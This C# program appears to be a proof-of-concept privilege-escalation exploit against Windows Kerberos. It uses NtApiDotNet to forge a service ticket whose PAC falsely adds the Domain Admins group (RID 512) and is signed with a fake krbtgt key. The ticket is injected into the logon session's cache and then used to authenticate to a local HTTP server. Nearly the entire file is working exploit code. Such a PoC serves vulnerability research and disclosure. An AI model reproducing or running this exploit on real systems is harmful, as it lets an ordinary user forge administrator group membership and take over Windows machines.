﻿using NtApiDotNet;
using NtApiDotNet.Win32.Security.Authentication;
using NtApiDotNet.Win32.Security.Authentication.Kerberos;
using NtApiDotNet.Win32.Security.Authentication.Kerberos.Builder;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;

namespace PoC_HTTPKerberosPac_EoP
{
    class Program
    {
        const string TARGET_SPN = "HTTP/FAKE";

        public static void DumpToken(NtToken token)
        {
            Console.WriteLine("User: {0}", token.User.Name);
            Console.WriteLine("Session ID: {0}", token.SessionId);
            Console.WriteLine("Groups:");
            foreach (var group in token.Groups)
            {
                Console.WriteLine("{0} - {1}", group.Sid.Name, group.Attributes);
            }
            Console.WriteLine("Can Impersonate?: {0}", TestToken(token));
        }

        public static bool TestToken(NtToken token)
        {
            using (var imp_token = token.DuplicateToken(TokenType.Impersonation, SecurityImpersonationLevel.Impersonation, TokenAccessRights.Impersonate, false))
            {
                if (!imp_token.IsSuccess)
                    return false;
                using (imp_token.Result.Impersonate())
                {
                    return NtToken.PseudoImpersonationToken.ImpersonationLevel >= SecurityImpersonationLevel.Impersonation;
                }
            }
        }

        public static KerberosCredential CreateTicket(KerberosAuthenticationKey key,
            KerberosPrincipalName server_name, KerberosPrincipalName client_name,
            string realm, Sid user_sid, params uint[] extra_rids)
        {
            if (key is null)
            {
                throw new ArgumentNullException(nameof(key));
            }

            if (server_name is null)
            {
                throw new ArgumentNullException(nameof(server_name));
            }

            if (client_name is null)
            {
                throw new ArgumentNullException(nameof(client_name));
            }

            if (string.IsNullOrEmpty(realm))
            {
                throw new ArgumentException($"'{nameof(realm)}' cannot be null or empty.", nameof(realm));
            }

            if (user_sid is null)
            {
                throw new ArgumentNullException(nameof(user_sid));
            }

            if (extra_rids is null)
            {
                throw new ArgumentNullException(nameof(extra_rids));
            }

            DateTime auth_time = DateTime.UtcNow.AddDays(-1);
            KerberosTime kerb_auth_time = new KerberosTime(auth_time);

            if (client_name.NameType != KerberosNameType.PRINCIPAL)
                throw new ArgumentException("Client name should be a principal.");
            string user_name = client_name.Names[0];

            KerberosAuthorizationDataPACBuilder pac = new KerberosAuthorizationDataPACBuilder();
            KerberosAuthorizationDataPACLogonBuilder logon = new KerberosAuthorizationDataPACLogonBuilder(user_sid.Parent);
            logon.UserAccountControl = UserAccountControlFlags.NormalAccount;
            logon.LogonTime = auth_time;
            logon.PasswordLastSet = DateTime.UtcNow;
            logon.PasswordCanChange = DateTime.UtcNow;
            logon.LogonServer = "PRIMARYDC";
            logon.LogonDomainName = realm.Split('.')[0];
            logon.UserSessionKey = new byte[16];
            logon.UserId = user_sid.SubAuthorities.Last();
            logon.PrimaryGroupId = 513;
            logon.EffectiveName = user_name;
            logon.FullName = user_name;
            logon.AddGroupId(513, GroupAttributes.Mandatory | GroupAttributes.Enabled | GroupAttributes.EnabledByDefault);
            foreach (var rid in extra_rids)
            {
                logon.AddGroupId(rid, GroupAttributes.Mandatory | GroupAttributes.Enabled | GroupAttributes.EnabledByDefault);
            }

            pac.Entries.Add(logon);
            pac.Entries.Add(KerberosAuthorizationDataPACSignatureBuilder.CreateServerChecksum());
            pac.Entries.Add(KerberosAuthorizationDataPACSignatureBuilder.CreateKDCChecksum());
            KerberosAuthorizationDataPACUpnDnsInfoBuilder upn = new KerberosAuthorizationDataPACUpnDnsInfoBuilder();
            upn.DnsDomainName = realm;
            upn.UserPrincipalName = user_name;
            upn.Flags = KerberosUpnDnsInfoFlags.Extended;
            upn.SamName = user_name;
            upn.Sid = user_sid;
            pac.Entries.Add(upn);

            KerberosAuthorizationDataPACClientInfoBuilder client_info = new KerberosAuthorizationDataPACClientInfoBuilder();
            client_info.ClientId = kerb_auth_time.ToDateTime().ToFileTimeUtc();
            client_info.Name = user_name;
            pac.Entries.Add(client_info);

            KerberosAuthenticationKey fake_krbtgt_key = KerberosAuthenticationKey.GenerateKey(KerberosEncryptionType.AES256_CTS_HMAC_SHA1_96);

            pac.ComputeSignatures(key, fake_krbtgt_key);

            KerberosAuthenticationKey ticket_key = KerberosAuthenticationKey.GenerateKey(KerberosEncryptionType.AES256_CTS_HMAC_SHA1_96);

            KerberosAuthorizationDataIfRelevantBuilder if_rel = new KerberosAuthorizationDataIfRelevantBuilder();
            if_rel.Entries.Add(pac);

            List<KerberosAuthorizationData> auth_data = new List<KerberosAuthorizationData>();
            auth_data.Add(if_rel.Create());

            KerberosTicketBuilder ticket_builder = new KerberosTicketBuilder(5, realm, server_name, 0, realm, client_name,
                kerb_auth_time, KerberosTime.Now, KerberosTime.MaximumTime, KerberosTime.MaximumTime, ticket_key,
                new KerberosTransitedEncoding(KerberosTransitedEncodingType.X500Compress, Array.Empty<byte>()), null, auth_data);

            var ticket_dec = ticket_builder.Create();

            Console.WriteLine("Verify: {0}", ticket_dec.FindPAC().ValidateSignatures(key, fake_krbtgt_key));

            Console.WriteLine(ticket_dec.Format());
            var ticket = ticket_dec.Encrypt(key);
            return KerberosCredential.Create(ticket, ticket_dec.ToCredentialInfo());
        }

        static void AddTicketToCache(string password)
        {
            var tgt = KerberosTicketCache.GetTicket("krbtgt", new Luid(0));
            string realm = tgt.DomainName;
            var key = KerberosAuthenticationKey.DeriveKey(KerberosEncryptionType.ARCFOUR_HMAC_MD5, password, 4096, tgt.ClientName, realm, 0);
            var server_name = new KerberosPrincipalName(KerberosNameType.SRV_INST, TARGET_SPN);

            var user_sid = NtToken.PseudoPrimaryToken.User.Sid;

            var cred = CreateTicket(key, server_name, tgt.ClientName, realm, user_sid, 512);

            KerberosTicketCache.SubmitTicket(cred);
        }

        static async Task Main(string[] args)
        {
            try
            {
                if (!Environment.Is64BitProcess)
                    throw new ArgumentException("Must run as a 64-bit process.");

                if (args.Length < 1)
                    throw new ArgumentException("Must specify the user's password");

                AddTicketToCache(args[0]);
                using (var creds = CredentialHandle.Create(AuthenticationPackage.KERBEROS_NAME, SecPkgCredFlags.Outbound))
                {
                    using (var ctx = new ClientAuthenticationContext(creds, InitializeContextReqFlags.None, TARGET_SPN, SecDataRep.Native))
                    {
                        var server = HttpAuthServer.RunServer();
                        await HttpAuthClient.Request(ctx);
                        await server;
                    }
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
    }
}
